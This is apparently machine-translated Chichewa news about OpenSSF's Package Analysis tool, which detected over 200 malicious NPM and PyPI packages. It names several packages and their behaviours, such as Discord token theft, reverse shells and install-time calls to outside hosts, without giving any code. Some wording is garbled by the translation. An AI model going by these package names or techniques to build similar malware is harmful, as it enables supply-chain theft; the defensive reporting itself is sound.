OpenSSF (Open Source Security Foundation), yopangidwa ndi Linux Foundation ndipo cholinga chake ndi kukonza chitetezo cha mapulogalamu otseguka, idayambitsa pulojekiti yotseguka ya Package Analysis, yomwe imapanga njira yowunikira kupezeka kwa code yoyipa m'maphukusi. Khodi ya polojekitiyi idalembedwa mu Go ndikugawidwa pansi pa layisensi ya Apache 2.0. Kusanthula koyambirira kwa nkhokwe za NPM ndi PyPI pogwiritsa ntchito zida zomwe zaperekedwa zidatilola kuzindikira mapaketi oyipa opitilira 200 omwe sanawonekere.
Zambiri zamaphukusi omwe ali ndimavuto amawongolera kuphatikizika kwa mayina omwe ali ndi zodalira zamkati zomwe sizidalira pagulu (kuukira kwa chisokonezo) kapena kugwiritsa ntchito njira za typosquatting (kugawa mayina ofanana ndi mayina a malaibulale odziwika), ndikuyimbiranso zolemba zomwe zimafikira omwe ali kunja ndondomeko yoyika. Malinga ndi omwe amapanga Package Analysis, ambiri mwazinthu zovuta zomwe zadziwika zidapangidwa ndi akatswiri ofufuza zachitetezo omwe amatenga nawo gawo pamapulogalamu opatsa ndalama, popeza zomwe zimatumizidwa zimangokhala ndi dzina la wogwiritsa ntchito ndi dongosolo, ndipo zochitazo zimachitidwa momveka bwino, popanda kuyesa kubisa khalidwe lawo .
Phukusi lomwe lili ndi zochitika zoyipa ndi:
- Phukusi la PyPI discordcmd, lomwe limalemba kutumiza zopempha zachilendo ku raw.githubusercontent.com, Discord API ndi ipinfo.io. Phukusi lotchulidwalo lidatsitsa kachidindo wakumbuyo kuchokera ku GitHub ndikuyiyika mu bukhu la kasitomala la Discord Windows, pambuyo pake idayamba kusaka ma tokeni a Discord mumafayilo ndikuwatumiza ku seva yakunja ya Discord yomwe imayendetsedwa ndi omwe akuwukira.
- Phukusi la colorss NPM linayesanso kutumiza zizindikiro kuchokera ku akaunti ya Discord kupita ku seva yakunja.
- Phukusi la NPM @roku-web-core/ajax - panthawi yoyika idatumiza zambiri zadongosolo ndikuyambitsa chothandizira (reverse shell) chomwe chimavomereza kulumikizana kwakunja ndikukhazikitsa malamulo.
- Phukusi la PyPI secrevthree - idayambitsa chipolopolo chakumbuyo potumiza gawo linalake.
- Phukusi la NPM mwachisawawa-vouchercode-jenereta - pambuyo potumiza laibulale, idatumiza pempho kwa seva yakunja, yomwe idabweza lamulolo ndi nthawi yomwe iyenera kuyendetsedwa.
Ntchito ya Package Analysis imatsikira pakusanthula ma code phukusi mu code source kuti mukhazikitse ma network, kupeza mafayilo, ndi kuyitanitsa malamulo. Kuphatikiza apo, zosintha zamaphukusi zimawunikidwa kuti zitsimikizire kuwonjezeredwa kwazinthu zoyipa mu imodzi mwazotulutsa zamapulogalamu omwe alibe vuto. Kuwunika momwe maphukusi atsopano akuwonekera m'malo osungiramo zinthu ndikusintha ma phukusi omwe adatumizidwa kale, zida za Package Feeds zimagwiritsidwa ntchito, zomwe zimagwirizanitsa ntchito ndi NPM, PyPI, Go, RubyGems, Packagist, NuGet ndi Crate repositories.
Phukusi Kusanthula kumaphatikizapo zigawo zitatu zofunika zomwe zingagwiritsidwe ntchito molumikizana komanso padera:
- Wokonza zoyambitsa ntchito yosanthula phukusi potengera zomwe zachokera ku Package Feeds.
- Wosanthula yemwe amawunika mwachindunji phukusi ndikuwunika momwe amagwirira ntchito pogwiritsa ntchito kusanthula kosasunthika komanso njira zotsatirira. Kuyesedwa kumachitika pamalo akutali.
- Chojambulira chomwe chimayika zotsatira za mayeso ku BigQuery yosungirako.
Source: opennet.ru